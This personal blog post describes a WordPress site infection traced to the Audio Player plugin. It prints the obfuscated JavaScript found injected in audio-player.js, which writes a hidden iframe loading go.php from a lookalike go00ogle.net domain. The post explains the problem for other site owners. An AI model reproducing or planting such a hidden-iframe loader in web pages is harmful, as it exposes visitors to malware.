So, as many visitors have probably noticed, longren.org has been listed as a suspicious site by Google. Visiting this site in Firefox will result in Firefox warning you that you could be visiting a website that could harm your computer.
[ad]
Turns out this blog was infected with a go00ogle.net malware script. After following this helpful blog post, I was able to pinpoint the Audio Player plugin for WordPress as the culprit. The infected file was audio-player.js, and contained this snippet of code that should not have been there:
function advQuery(){
var adv="http://google.com/";abs=unescape("%69%66%72%61%6D%65");Track="?sid=1";get=unescape("%6E%65%74");
document.write("<"+abs+" src="+adv.substr(0,9)+unescape("u0030u0030")+adv.substr(9,5));
document.write(get+"/go.php"+Track+" style=display:none><"+"/"+abs+">");
};advQuery();
I decided to just deactivate that plugin instead of deleting that piece of code from audio-player.js. This way there’s no chance audio-player.js will become infected again.
Well, now what?
Work with Me
I'm available for hire and always taking new clients, big and small. Got a project or an idea you'd like to discuss? Startup plan but no developer to make it happen? Just get in touch, I'd love to see if I can help you out!
Leave some Feedback
Got a question or some updated information releavant to this post? Please, leave a comment! The comments are a great way to get help, I read them all and reply to nearly every comment. Let's talk. 😀
Longren.io is proudly hosted by DigitalOcean
oh yes it is really useful. thank you.